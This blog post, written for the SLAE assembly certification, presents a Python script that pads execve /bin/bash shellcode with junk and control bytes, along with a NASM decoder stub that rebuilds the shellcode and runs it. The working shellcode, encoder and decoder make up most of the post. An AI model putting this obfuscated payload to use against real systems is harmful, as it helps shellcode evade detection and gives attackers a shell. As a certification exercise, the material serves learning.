martes, 6 de mayo de 2014

[SLAE] IV Simple Encoder/decoder

Source: SecurityTube

Ok, here I will show simple Enconder/decoder, source code can be found in github.
How encoder work:

  1. Get random number between 1-3 (link to python encoder script)
  2. After add control number to shellcode, add junk bytes
Example:
------------------------------------------------------------------
|  G   |  C   |   J   |   J   |  G   |   C  |  J   |  J   |   J   |   G |
------------------------------------------------------------------

G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes

#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
    
    if ident == 'number':
        return randint(1,3)
    
    elif ident == 'char':
        return randint(65,122)#only [a-z[]\^_`A-Z]

shellcode  = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
#end     = "\\xf0\\x0d"

for x in bytearray(shellcode):
    
    encoded += '\\x%02x' % x
    
    random = get_random('number')
    encoded += '\\x%02x' % random
    
    for i in range(random-1):
        
        encoded += '\\x%02x' % get_random('char')

#encoded += end #probably we will need it for correct jump

print encoded
print 
print encoded.replace("\\x", ",0x")[1:]

print 'Initial len: %d, encoded len: %d' % (len(shellcode), 
    len(encoded)/4)

Decoder.nasm
section .text
global _start
_start:
        jmp short end ; jmp pop call
 
decoder:
 
        xor eax, eax    ; clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx
 
        pop edx         ; get addr of shellcode putted by call starter
        push edx        ; backup for call :D
 
        mov esi, edx    ; mov shellcode start addr to esi (source)
        mov edi, edx    ; mov shellcode start addr to edi (destination)
        inc esi         ; point to the first dest byte, how many bytes we need to remove/espace
        inc edi         ; point to the first random number
        
        mov cl, 89      ; loop counter/your shellcode length, if you use diferent shellcode need adjust it
 
restore: ;decode
        xor eax, eax
        xor ebx, ebx
 
        mov al, byte [edi]  ; read distance to next byte
        add eax, edi        ; eax = addr of the next valid byte
 
        mov bl, byte [eax]  ; bl = next valid byte of the shellcode
        mov byte [esi], bl  ; move it to the final position
 
        mov edi, eax        ; put latest valid pisition into edi 
        inc edi             ; next distance
        inc esi             ; next valid byte
 
        loop restore        ; loop
        
        pop ecx             ; call shellcode
        call ecx            
 
        xor eax, eax        ; exit the shellcode (if it returns)
        mov al, 1           
        xor ebx,ebx         
        int 0x80            
 
end:
        call decoder  ; put shellcode addr into stack
        shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


No hay comentarios:

Publicar un comentario en la entrada